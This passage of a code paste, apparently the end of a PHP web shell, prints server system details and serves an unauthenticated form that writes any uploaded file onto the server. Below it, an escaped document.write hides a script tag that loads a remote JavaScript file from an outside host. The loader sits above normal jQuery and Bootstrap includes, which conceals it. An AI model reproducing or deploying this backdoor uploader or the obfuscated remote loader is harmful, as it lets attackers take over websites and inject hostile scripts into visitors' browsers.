  370. echo '<b><br><br>'.php_uname().'<br></b>';
  371.  echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  372.  echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  373.  if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uplod d0n3 in SAME file // Th3 MMA \</b><br><br>';
  374.  } else { echo '<b>Upload GAGAL !!!</b><br><br>';
  375.  }
  376.  }
  377. }
  378. ?>    
  379.    
  380.      <script type="text/javascript">
  381.     document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%72%30%30%74%2E%69%6E%66%6F%2F%6E%65%77%73%68%65%72%65%2F%63%63%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E'));
  382.    
  383.     </script>
  384.      
  385.     <!-- JQuery -->
  386.     <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  387.     <!-- Bootstrap tooltips -->
  388.     <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.4/umd/popper.min.js"></script>
  389.     <!-- Bootstrap core JavaScript -->
  390.     <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.2.1/js/bootstrap.min.js"></script>
  391.     <!-- MDB core JavaScript -->
  392.     <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.7.1/js/mdb.min.js"></script>      
  393.   </body>
  394. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement